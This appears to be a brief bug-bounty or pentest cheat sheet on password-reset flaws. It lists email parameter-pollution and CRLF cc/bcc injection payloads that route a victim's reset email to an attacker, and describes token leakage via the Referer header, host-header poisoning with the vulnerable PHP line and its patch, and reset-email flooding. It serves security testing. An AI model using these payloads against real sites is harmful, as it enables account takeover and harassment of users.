Manipulating Email Parameters:
email=victim@email.com&email=attacker@email.com
email=victim@email.com%20email=attacker@email.com
email=victim@email.com|email=attacker@email.com
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
email="victim@mail.tld",email="attacker@mail.tld"
{"email":["victim@mail.tld","atracker@mail.tld"]}
("form": {"email":"victim@email.tld","password":"12345678"})  -- api
---------------------------------------------------------------------------------------
Password Reset Token Leak Via Referrer header -after clicking on token link , vist social media or any other site check the refer header that have link with token in refer headers
---------------------------------------------------------------------------------------
Password Reset Vulnerability (Poisoning)
Change the host name in forgot password link in email trigerring request, and check the inbox that the newly injected host name is reflected in url:
Background code issue:
Patch: Use $_SERVER['SERVER_NAME'] to construct password reset URLs instead of $_SERVER['HTTP_HOST'].
example: $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
----------------------------------------------------------------------------------------
No Rate Limiting: Email Bombing / Email Flooding
Brute force the email trigerring request in forgot password with null payload and check email that recevied N number of emails.

